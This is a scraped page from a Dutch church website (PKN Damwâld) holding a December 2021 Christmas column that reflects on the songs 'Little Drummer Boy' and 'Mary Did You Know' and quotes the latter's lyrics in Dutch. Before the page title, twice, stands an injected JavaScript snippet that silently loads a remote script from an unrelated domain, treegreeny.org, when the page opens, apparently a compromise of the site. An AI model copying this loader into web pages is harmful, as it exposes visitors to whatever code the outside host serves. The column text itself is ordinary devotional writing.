;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mary did you know - PKN Damwâld

Mary did you know

Gepubliceerd op: maandag 27 december 2021

In  normale omstandigheden zouden in deze tijd veel samenkomsten worden gehouden, zowel concerten als zangavonden, waarin bekende Kerstliederen zouden worden gezongen. Liederen als ‘Ere zij God’ en ‘Stille Nacht’ staan eigenlijk bij elke zangdienst of bij elke uitvoering op het repertoire. En ik denk terecht. Ook in winkels of Kerstmarkten (hoewel die momenteel weinig zullen worden gehouden) klinken bekende en minder bekende Kerstliederen. Of er altijd wordt nagedacht of stilgestaan bij de tekst van de liederen, vooral in winkels, is minder vanzelfsprekend. Van twee Kerstliederen wil ik stilstaan bij de inhoud: Het ene is: ‘Little drummer boy’. De tekst gaat over een kleine jongen die het Kind Jezus een geschenk wil aanbieden. Maar aangezien hij arm is heeft hij geen tastbaar geschenk. Dan besluit hij, omdat hij wel een eenvoudige trommel heeft, een serenade aan het Kind te brengen. Het andere Kerstlied, waaraan het opschrift boven deze column is ontleend, is het lied ‘Mary did you know’. De tekst van dit lied geeft stof tot nadenken en is ook de aanleiding voor de vraag of wij geloven dat dit Kind ook voor ons persoonlijk is gekomen. ‘Maria wist je…….?, Maria, wist je dat je Kleine Jongen op een dag op water zou lopen? Maria, wist je dat je Kleine Jongen op een dag onze zonen en dochters zou redden? Wist je dat je Kleine Jongen is gekomen om ons nieuw te maken? Dit Kind dat je hebt vrijgelaten zal binnenkort jou vrijmaken. Maria, wist je dat je Kleine Jongen zicht zal geven aan een blinde? Maria, wist je dat je Kleine Jongen de storm kan bedaren met Zijn hand? Wist je dat je Kleine Jongen in de voetsporen van engelen heeft gelopen? Als je je Kleine Jongen kust, heb je het gezicht van God gekust. Maria wist je dat … De blinden zullen zien. De doven zullen horen. De doden zullen weer leven. De kreupelen zullen springen. De dommen zullen lofspreken … over het Lam. Maria, wist je dat je Kleine Jongen de Heer is van de hele schepping? Maria, wist je dat je Kleine Jongen op een dag de naties zou regeren?  Wist je dat je Kleine Jongen het perfecte Lam van de hemel is? Het slapende Kind dat je vasthoudt is de grote Ik Ben’.

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns